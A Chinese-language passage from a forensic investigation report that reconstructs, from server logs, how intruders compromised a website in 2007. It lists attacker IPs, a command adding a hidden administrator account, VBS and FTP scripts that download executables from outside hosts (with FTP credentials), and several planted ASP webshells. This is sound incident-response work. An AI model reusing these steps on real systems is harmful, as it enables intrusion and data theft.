安全专家：真实的网络攻击取证纪实

核心提示： 由于服务器被网管人员重新装过，初步怀疑是用的ghost安装的，安全专家：真实的网络攻击取证纪实(4)，造成了原珍贵日志数据无法找回，我们只能分析出7月份-12月份这段时间的日志，通过这些日志我们又发现了针对此站点的入侵记录，入侵者操作再现：（黑客入侵操作过程分析）2007-07-15 14

由于服务器被网管人员重新装过，初步怀疑是用的ghost安装的，造成了原珍贵日志数据无法找回，我们只能分析出7月份-12月份这段时间的日志，通过这些日志我们又发现了针对此站点的入侵记录。

入侵者操作再现：（黑客入侵操作过程分析）

2007-07-15 14:51:53 61.184.107.206 添加管理用户 net localgroup administrator Cao$ /add

2007-07-15 15:08:56 61.184.107.206 写下载exe的vbs脚本 c:admin.vbs 试图下载exe地址为：http://www.dianqiji.com/pic/2007/0428/admin.exe

2007-08-12 09:48:45 218.205.238.6 写入webshell小马:d:ybcentergg3.asp shell里留的　　QQ:183037，之后此人频繁用此后门登陆服务器

2007-08-25 08:03:15 218.28.24.118 曾访问他以前留下的操作数据库的webshell /system/unit/main.asp 此后门可以浏览到敏感数据库的信息

2007-08-25 08:12:45 218.28.24.118 写入另一个webshell D:ybcenterggsm.asp

之后，218.28.24.118用以前留下的功能比较全的webshell /Cnnsc.asp和/system/unit/Cnnsc.asp频繁操作服务器上文件

2007-11-11 14:23:23 218.28.24.118 用他曾经留下的操作数据库的后门/service/asp.asp访问敏感数据库的信息

2007-08-25 08:27:57 218.28.24.118 用他曾经留下的操作数据库的后门/system/unit/sql.asp访问敏感数据库的信息

2007-11-11 11:02:55 218.28.24.118 试图访问他曾经留下的操作数据库的后门/yb/in_main3.asp访问敏感数据库

2007-08-06 12:42:41 218.19.22.152 写下载脚本C:down.vbs 下载的exe为http://ray8701.3322.org/1.exe

2007-08-09 11:57:16 218.19.98.147 写ftp下载exe的脚本c:zxq.txt ftp服务器203.253.31.244 用户名kick1000 密码84460965 下载1.exe